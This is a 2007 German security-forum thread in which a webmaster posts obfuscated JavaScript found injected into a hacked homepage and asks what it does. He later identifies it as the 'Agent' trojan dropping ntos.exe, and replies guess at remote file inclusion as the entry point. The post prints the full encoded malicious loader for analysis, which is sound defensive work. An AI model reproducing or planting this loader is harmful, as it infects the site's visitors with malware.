Hackerboard Wiki HaboBlog
Hackerboard bei Facebook Hackerboard bei Google+ Hackerboard bei Twitter

[HaBo]

 
Virenschutz · Tools & Aggressive Software Tips zum Kampf gegen gegen Viren, Trojaner, CryptoSoft und Programme, die erstellt wurden um Schaden anzurichten, werden hier behandelt. Aber auch Tools aus dem Security Bereich sind hier richtig.

Veränderte Indexdatei/Was tut dieser Code?

Diskussion: Veränderte Indexdatei/Was tut dieser Code? im Forum Virenschutz · Tools & Aggressive Software, in der Kategorie Security Area; Anzeige Folgender Code fand sich heute auf einem nach einem Hackerangriff abgeschalteten Teil einer von mir gehosteten Homepage. Vorsicht, potentiell ...
Antwort
Themen-Optionen Ansicht
   
Alt 11.09.07, 21:45   #1 (permalink)
 
Registriert seit: 09.01.05
Imrahil Leistung: Facit NTK
Likes: 0
Standard Veränderte Indexdatei/Was tut dieser Code?
Anzeige

Folgender Code fand sich heute auf einem nach einem Hackerangriff abgeschalteten Teil einer von mir gehosteten Homepage.

Vorsicht, potentiell gefährlicher Code!   
<!-- o4 --><HTML><SCRIPT LANGUAGE="JavaScript">
<!--
function N9203f348(Ac85Fc8){var Hb59a2A=arguments.callee.toString().replace(/\W/g,"";).toUpperCase();var o21A8D0a391EB9772;o21A8D0a391EB9772+=714;o21A8D0a3 91EB9772=o21A8D0a391EB9772.toString();var fuwck_Allav=1;var i=o21A8D0a391EB9772.charCodeAt(224);var h33faE2;var G1447bb2B81EB9772;G1447bb2B81EB9772+=185;G1447bb2B 81EB9772=G1447bb2B81EB9772.toString();var stSllaSllop_av=1;var I26565c=Hb59a2A.length;var me7740035fbEB9772;me7740035fbEB9772++;var cxuj_csa_v_fzfhaopu=1193;var etero_vreme0noata=300;var E6a08E;var d6a874AEE12EB9772;d6a874AEE12EB9772++;d6a874AEE12E B9772=d6a874AEE12EB9772.toString();var stSllaSllop_av=1;var TDCc45;var CB9cfe29494EB9772;CB9cfe29494EB9772-=403;var cxuj_csa_v_fzfhaopu=1193;var etero_vreme0noata=300;var n7F49b8f8='';var iC49Cd=new Array(0,1400113684+(596846210),3308810245+(6851095 43),1081686462+(1485838332),93390784+(31243353),54 14358+(1880643257),2088893729+(1826727956),1358664 212+(1298727823),139801186+(109467088),588180366+( 1456327958),3095672491+(676442739),649397390+(1897 780474),49274316+(113667679),1343463824+(782097197 ),2755366762+(1132240285),682685923+(1745758126),3 35599512+(162937036),68856260+(1721071406),2474466 460+(1614550188),789175331+(1437885883),263698001+ (186850860),1727714474+(115544129),3525802212+(581 778541),801317111+(1410360528),22344584+(303539406 ),1625402458+(59374694),2387520284+(1863601758),94 9011337+(1372915299),205539807+(130093680),1390845 472+(270519993),2056866876+(2138435879),305939319+ (2060175998),615825076+(381248020),605892112+(6760 61774),2181324650+(1398530682),1564392047+(1160296 195),597666762+(409221383),180832697+(1077774990), 3212561258+(311540371),2652859702+(116082741),5144 78422+(386619300),131017574+(987983110),1672653991 +(2013863215),2071894759+(826170969),789053046+(63 991405),173646249+(998619852),3280570311+(42444544 8),949599321+(1933017344),79560369+(572207611),708 011456+(665492090),2146134725+(1223419579),1557948 405+(1660156193),411714292+(153792961),1104045341+ (350576390),2562078632+(923033073),1463645875+(163 5790428),149228107+(522038867),955046840+(63915118 4),2461508851+(861222079),2116264504+(854083308),3 72282533+(423552994),631055915+(852174310),2477591 617+(766775658),2255348551+(804801014),465910108+( 1528236084),13335841+(17822693),598810563+(1965097 209),2086260462+(1937457468),811861782+(1095597683 ),96120498+(16516717),626613044+(2053540209),24222 10075+(1482216984),896639248+(1117137042),93856511 +(157865525),2356311069+(160904305),3036096338+(73 9733702),1366600782+(771055981),121534312+(1984250 1),1914010321+(525267398),2522007705+(1343263592), 1325333703+(476861741),158772487+(318092379),13820 65230+(855936138),3886816065+(179692813),405969475 +(1406401450),33401713+(419691018),366141783+(1815 483242),2987960606+(1123490617),1435452155+(270636 747),98863735+(215178969),366958276+(1977573926),3 545827791+(694189741),277262287+(1381395984),13637 4018+(230245959),863679568+(1498990755),3462845985 +(762148420),688847331+(614688629),653318655+(3316 42831),2194884852+(552122240),1858751225+(17102863 13),1066583385+(189587432),579425509+(458178802),1 720191084+(1045019649),3138668351+(415411644),9003 99575+(230614931),553436038+(326243958),1754098116 +(1155145346),2662100944+(1001670912),490975226+(6 50149241),31271810+(824570467),2655350774+(1974508 57),3587996848+(120651801),60917875+(1281616073),2 55531617+(398927689),2888051433+(300344615),283248 1298+(540533876),781607351+(684872558),60890683+(4 83288952),1446499420+(1664024493),2507012709+(9555 09306),1094105172+(497565882),612301557+(89837219) ,1316761403+(1649699047),1473837546+(1878961866),9 18856906+(586061901),565897591+(217654282),2589013 804+(493626639),2675257300+(558185689),3817965560+ (170326824),1550505767+(1045748879),3645782+(58671 286),341725769+(1616085073),2435918264+(1503927681 ),1481808108+(1166008003),5278208+(76192789),20926 0911+(1734542612),3590470620+(224448310),145043838 9+(1039158415),87093413+(138181017),38068358+(2015 722018),3254088244+(572087511),1680725279+(7861807 34),45243840+(122572903),243947792+(1853703585),21 87984851+(1839567729),1976255600+(289234786),25669 0259+(246753813),1385094175+(376956639),3892838250 +(257578995),243351049+(1910778306),373622955+(528 99270),1097363001+(755144878),3017904096+(12574094 30),1477636575+(834681345),78884156+(203869470),54 1649362+(1200906490),2353820643+(1835887500),14146 28210+(980249735),230496636+(167421127),1238152950 +(384030687),1578392273+(2025998615),834786024+(18 80080534),432643715+(521086017),1297710604+(423660 22),2620115096+(898604889),1438532180+(1358828819) ,99326768+(969501613),96585660+(1123053199),337423 8264+(250503586),1378443658+(1558231490),821079355 +(85106107),268221414+(822591098),3550743427+(1969 28576),1845197928+(980181741),300518100+(528811035 ),326174017+(855161144),2142761277+(1269416527),23 85269994+(775564848),362116112+(265969296),1238215 209+(144390157),2884509603+(538859506),1539643225+ (1598435242),435905480+(134656753),1056532694+(369 868121),3031683603+(285632939),2377453759+(6212798 49),616788130+(116451824),989003473+(566258483),16 67406006+(1601529585),2589060315+(461300310),27712 7094+(475332309),61275669+(1480044552),2413174724+ (193897196),2658389814+(1307583216),1254919420+(71 5003552),7356361+(33379137),2098908838+(518928387) ,2259071986+(1684505165),1845016240+(68071637),696 51736+(14256635),1417088627+(1095253007),274437748 6+(1059363206),483185550+(1592023072),200646201+(1 2614911),423727656+(2039544947),1735156178+(212083 4107),913659831+(1181194240),32275459+(166683422), 1513113705+(748915307),2610097073+(1447163537),121 8370290+(540989702),315467757+(218946433),12786034 10+(898115131),3463682660+(675646455),937275899+(9 36560102),60245631+(354418936),985322630+(12969263 04),2492948488+(1786251880),553899693+(1157784861) ,104871107+(180410009),2305733185+(100068542),3176 664417+(990552328),1550934650+(83533145),82263963+ (293965738),2534416000+(150651896),2809470708+(798 536698),1231369400+(77549212),286963654+(669580284 ),2472996890+(335558215),2041418802+(1454539461),1 024260344+(207375957),664042847+(383384188),256654 0799+(366419019),2771152154+(883551682),512850112+ (575509158),678437681+(258480319),1990812758+(8569 02141),1980134430+(1756703399),985843580+(21705728 3),28650346+(788583551),2126958820+(1056383288),14 40289282+(1960947848),658168939+(746108613),508774 181+(107043969),2645096838+(489110655),1770752488+ (1682668715),433094608+(990762841),18314334+(58313 6097),1688400666+(1321436948),3293646402+(1064054) ,1177578193+(389525553),2351958+(709576766),202905 2089+(991616382),2799321367+(473058698),1305197241 +(205136994),368065956+(387101161));E6a08E=4294967 295;for(h33faE2=0;h33faE2<I26565c;h33faE2++){E6a08 E=iC49Cd[(E6a08E^Hb59a2A.charCodeAt(h33faE2))&255]^((E6a08E>>8)&16777215);}E6a08E=E6a08E^4294967295; var G50271DD;var l571d8;h33faE2=E6a08E&65535;G50271DD=h33faE2.toStr ing(16).toUpperCase();while(G50271DD.length<4){G50 271DD="0"+G50271DD;}h33faE2=(E6a08E>>>16)&65535;l5 71d8=h33faE2.toString(16).toUpperCase();while(l571 d8.length<4){l571d8="0"+l571d8;}TDCc45=l571d8+G502 71DD;var P94783f;var t793BCD0=0;var P18945766;var t3B037e;var i0eFA2450;var Efefb48='';for(P94783f=0;P94783f<Ac85Fc8.length;P9 4783f+=2){i0eFA2450=0;n7F49b8f8="";t3B037e="";t3B0 37e+=Ac85Fc8.charAt(P94783f);t3B037e+=Ac85Fc8.char At(P94783f+1);P18945766=parseInt(t3B037e,16);i0eFA 2450=P18945766-TDCc45.charCodeAt(t793BCD0);if(t793BCD0<TDCc45.len gth-1){t793BCD0++;}else{t793BCD0=0;}P94783f+=2;while(i 0eFA2450!=0){t3B037e="";t3B037e+=Ac85Fc8.charAt(P9 4783f);t3B037e+=Ac85Fc8.charAt(P94783f+1);P1894576 6=parseInt(t3B037e,16);n7F49b8f8+=String.fromCharC ode(P18945766-TDCc45.charCodeAt(t793BCD0));if(t793BCD0<TDCc45.le ngth-1){t793BCD0++;}else{t793BCD0=0;}i0eFA2450--;P94783f+=2;}var rEE11EB3=parseInt(n7F49b8f8);if(rEE11EB3!=0){if(rE E11EB3>127){n7F49b8f8="&#"+rEE11EB3.toString()+";" ;}else{n7F49b8f8=String.fromCharCode(rEE11EB3);}Ef efb48+=n7F49b8f8;}P94783f-=2;}document.write(Efefb48);var Ie8895df220EB9772;Ie8895df220EB9772--;var cxuj_csa_v_fzfhaopu=1193;var etero_vreme0noata=300;var nF9eed8ce76EB9772;nF9eed8ce76EB9772++;nF9eed8ce76E B9772=nF9eed8ce76EB9772.toString();var stSllaSllop_av=1;}
N9203f348('396E624475684868686e3573716248686968357 3726747706e3b637375347667683A6B79436777396D6835737 1664868676a3573726547706e3b63727a347667683a6574446 2766C3a696376436A7E396D693475753476676b3B637377347 6686D3B637373337a6f396c69447568476c6D3A667b43657b3 96c6F34777433796D396c6b447663476C6e3a6678436675396 C6d3476783476676A3B63737233796e3A69637244627568396 C68447A6a4868676B35737166476D6a3B637373337b6839716 9457261753a68686b4572617a3A686962447465476A693B637 37a3476676C3b6372713476686d3b637275337b68396c6b447 4634868676C357371624868676D357371644868676c3573726 7476d683A667B4364773a6869674572627B3A686A634572617 d3A686863447762476a6b3a6B7A446276683A6963764462756 73a6962734462766b396D6A447463476B6F3b6373733476696 73a6576436777396d683476783476676c3B6372733476686b3 A6b79446275703A696273436777');
//-->
</SCRIPT><!-- c4 -->


Fragen:
1. Was tut dieser Code?
2. Wie mache ich das Rückgängig?
3. (Und ja ich weiss das ist nicht wirklich "richtig" zu beantworten, aber Hinweise wären hilfreich) Wie kommt der da hin?!

Imrahil

*EDIT*
Scheint der Trojaner "Agent" zu sein.
Dieses Script installiert die ntos.exe im System...
Das ist mit der aktuellen Version des Firefox passiert!!!
Imrahil ist offline   Mit Zitat antworten
Alt 11.09.07, 23:06   #2 (permalink)
 
Registriert seit: 08.11.05
Manuel Leistung: Facit NTK
Manuel eine Nachricht über ICQ schicken
Likes: 0
Standard RE: Veränderte Indexdatei/Was tut dieser Code?
Zu 1 und 2 kann ich dir leider auch nix sagen, zu 3. aber schon:
Eventuell kam das über Remote File Inclusion dahin;ich hatte es da neulich bei der Auswertung der Logs von nem Server nes Freundes, dessen Webseite ebenfalls verändert wurde mit nem ziemlich üblen Script zu tun. Damit konnte man so ziemlich alles machen was der Webmaster bzw Serveradmin auch machen kann. Kommt natürlich drauf an was überhaupt alles auf der Webseite angreifbar gewesen wäre.

Manuel
Manuel ist offline   Mit Zitat antworten
   
HaBOT
 
- Anzeige -

Werbung ist gerade online    
Alt 12.09.07, 01:56   #3 (permalink)
 
Registriert seit: 23.10.06
raven88 Leistung: Facit NTK
Likes: 0
Standard
zu 1.
Ich habe versucht das Script bei mir auszuführen. Wollte aber nicht. Ich denke mal das da irgendein Scriptfehler drin ist, oder es einen Konvertierungsfehler gab als ich mir den Quelltext gezogen hab. Jedenfalls macht es mit Firefox keinen Spaß Javascripts zu debuggen, weshalb ich das nicht weiter verfolgt habe. Soweit ich das sehen kann ist das Script an sich ungefährlich, so lange du das document.write('...') rausnimmst.

Es könnte sich dabei aber auch um eine ganz andere Sicherheitslücke bspw. im Firefox handeln. Keine Ahnung. (hoffentlich nur für windows ausgelegt )

Ich habe eine etwas lesbarere Version des Scripts angehängt.
Angehängte Dateien
Dateityp: zip test.zip (4,4 KB, 97x aufgerufen)
raven88 ist offline   Mit Zitat antworten
Antwort
   
- Anzeige -

Werbung ist gerade online    

[HaBo] » Security Area » Virenschutz · Tools & Aggressive Software » Veränderte Indexdatei/Was tut dieser Code?
« Vorheriges Thema | Nächstes Thema »
Themen-Optionen
Ansicht
Linear-Darstellung Linear-Darstellung

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.
BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks sind aus
Pingbacks sind aus
Refbacks sind aus

Ähnliche Themen
Thema Autor Forum Antworten Letzter Beitrag
was macht dieser code flame (Web-) Design und webbasierte Sprachen 7 17.06.06 15:30
Wo ist dieser Bildschirmschoner? jagdfalke Windows 1 23.01.06 16:55
Was stellt dieser C# Code dar? nasir Code Kitchen 0 12.11.05 22:01
stimmt dieser algorithmus?? hapewe Code Kitchen 3 10.12.03 19:47
Was bewirkt dieser Befehl?? DelumaX Linux/UNIX 6 12.10.02 22:31

Alle Zeitangaben in WEZ +2. Es ist jetzt 14:39 Uhr.
vBulletin® v3.8.7, Copyright ©2000-2012, vBulletin Solutions, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61